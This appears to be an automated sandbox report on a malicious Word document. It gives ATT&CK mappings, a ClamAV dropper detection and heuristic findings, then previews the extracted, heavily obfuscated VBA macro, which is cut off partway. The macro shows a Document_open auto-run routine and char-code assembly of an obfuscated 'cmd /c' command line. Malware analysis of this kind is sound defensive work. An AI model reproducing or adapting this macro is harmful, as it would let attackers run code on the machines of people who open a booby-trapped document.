MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6612832-0' further supports this dropper functionality. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6612832-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6612832-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27712 bytes |
SHA-256: 61288e3cea66d1f8b6f913f4017a7902a85f051c31591e65be8cb01edf005c84 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cuHwBMZvwP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UBrzLnOXWFK()
JznFX = (OAAWw * fLQwZ / 16046 / UNnsFl) - 1648 + jdDsZ + titokZ / 41287 * (89771 / 38352 + TarTz / RdcwV)
UuLjQ = (XdLtG * RjlEH / 51603 / ESdhB) - 67015 + uzdztG + USGsrc / 80712 * (93479 / 41662 + UNqWI / JRQClu)
FiTWj = (XwiWpl * WJojba / 87614 / YfuhVf) - 22032 + PbFuN + GQCoMw / 32094 * (79788 / 7253 + iUdIp / WvFvjC)
fSqjG = (mHVhdf * zWnIj / 37211 / YRwvV) - 49495 + mkrWk + TimBD / 46571 * (85607 / 80986 + zUNUq / skOYqR)
KCLWOu = (qPiCYj * NwJjbt / 98061 / BDkWF) - 19825 + RHDrMd + ltbJR / 84341 * (9665 / 90230 + QMkiI / zbfqKA)
End Function
Function WwHIZGQPzArRza()
fTirnn = (GZOsX * wuXrw / 96311 / SiSPT) - 49611 + sDTQj + IdCUkG / 79205 * (28151 / 17072 + TwcYP / QfdLJJ)
kRJwU = (LGAWzP * mqFEQ / 50424 / qaphR) - 1942 + TTMOq + qtSkIV / 6029 * (54260 / 88881 + WPnioA / LWnXZJ)
TYNmP = (FwIhM * sCGpI / 7814 / PzTqB) - 72712 + nnnYj + cBAMsD / 98016 * (10635 / 16490 + nvLvj / ZnCFA)
zHnAER = (RVYdX * wMQaz / 19500 / QGrCi) - 90919 + oiJSd + EhGik / 87444 * (9938 / 80270 + nActNC / bqwQmN)
WKRqEK = (ZNAqC * PCFOR / 35957 / BrloPj) - 16910 + aCMbi + KsizlA / 75165 * (39860 / 70881 + BIObu / iNFrki)
AhMAz = (SKkAN * qCuwFF / 7006 / dfvqp) - 63999 + OzVaz + zzijCz / 79805 * (81023 / 20964 + uwEsK / rzAwiY)
End Function
Private Sub Document_open()
On Error Resume Next
QjZPk = (IYELw + wGnjr - (80071 - JPaMl + 68416 - BichFl * 65575 + JoozK - (31892 / uDhwHq / 91655 * 67521)))
lGTWGN = (wEIqV + IzGkZv - (64815 - FhElDE + 93250 - sLcWZV * 27084 + uTlSI - (85874 / UoCWUM / 75487 * 50072)))
zUlzp = (nfoBa + WFLfrz - (97848 - rfojVW + 59896 - cGFzrM * 15224 + wITUB - (38541 / PCwhb / 75118 * 53984)))
nTbtW = (stQUFw + IFbHd - (71445 - DanMEb + 15594 - rEdwq * 13925 + FCdTa - (14945 / rnJCd / 64957 * 60880)))
XUXwE = Application.Run("rcXdwIIMubi", "" + qdSfFdSozDiv + Kzuiidi + CVar("c") + JZdWpDAAHH + jplriAf + AthTnC + acPMEMLAIA + blwPFAiHsi + cdrbr + VTHfczFEb + VoKvi + jmGQDYWkOj + asmwM + mbIwbEjGIj + taCLzKV + zEcIDwJrJSp + wKUfSAu + uDMMjOovVk + rGHwlzYd)
plFTsE = (AISiz + mrUaif - (88991 - BaKQdz + 19411 - YbTFH * 9241 + isYYaK - (58279 / QJssuh / 89736 * 49831)))
rwjAD = (zadaj + EmuJZ - (76715 - YFXEfv + 4433 - fvfstN * 68675 + QdfLm - (94616 / HbflCV / 7805 * 54700)))
InKuCO = (uAjrK + bhPqhG - (13666 - RXwtG + 70696 - PSiBX * 49682 + RRjpJT - (62429 / vmFSR / 21212 * 59389)))
End Sub
Function pMrPOAwiwi()
BvqiF = (ptANG + ViHntU - (4031 - zRcjqT + 729 - rRjvAG * 72669 + HOviZp - (85254 / jAkio / 16558 * 25074)))
QQfaYh = (iTsfR + lmVtJi - (20068 - ZmZNi + 76011 - VMwJn * 42175 + sBrPjt - (48297 / vFNwvG / 78831 * 34265)))
tGnJG = (TOuYz + RlimN - (43247 - dADrvK + 60740 - XOzWlU * 35973 + VCnLv - (41566 / nMXEko / 10359 * 1047)))
qnRbQ = (GrwnmG + JooTvk - (53583 - hhNIB + 6902 - tfVBcq * 92684 + Apuhk - (41279 / CZknE / 24020 * 14857)))
TjBpOr = (aQvzuB + zzcIk - (51082 - sIUQf + 46713 - vzSOI * 62176 + nQSHK - (77970 / iZjsKL / 14441 * 71937)))
End Function
Attribute VB_Name = "EkTHnmN"
Function AthTnC()
On Error Resume Next
Tnzws = (FUEND + OzuQvV + XJHipL + jiNFwi * 70350 / oNXajp / 58486 - uCfWj - (pnKhia / LIJnM - (aHwOU - WJhsU)))
imdBTd = ipJUUJ - tLDvi / 20378 * vmQPK / GkqPwQ * DOVNdm - hToIKG - 42247 * NRuVv - nzNmJ
twtWER = (iqqRw + qbzIED + hWZUc + lQPIb * 38216 / vnVul / 13001 - GuXacY - (QMBEh / HAXZY - (jfwPiP - rkDGDW)))
ZrFurdLKqZG = CStr(Chr(AsTSZjwUonAIkn + zuwYZriEG + 109 + iCdolzz + sbBzoITlD)) + "d " + "/" + CStr(Chr(zJLQtpFaIN + WfTSLwOJ + 99 + wVVtwjQYsBr + VqMvvtWw)) + " f" + "^o^R ;" + " ; /^f" + " ; " + CStr(Chr(PiUUpHnoGkR + vAtVJkUNUrYwc + 34 + SPQhvrF + PbQFMkupKzR)) + " "
wMcKov = (oavREK + cEOnTR + DwnKN + lIvps * 52529 / FwjzwR / 71653 - jCzQwj - (cdhVlo / Qpz
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.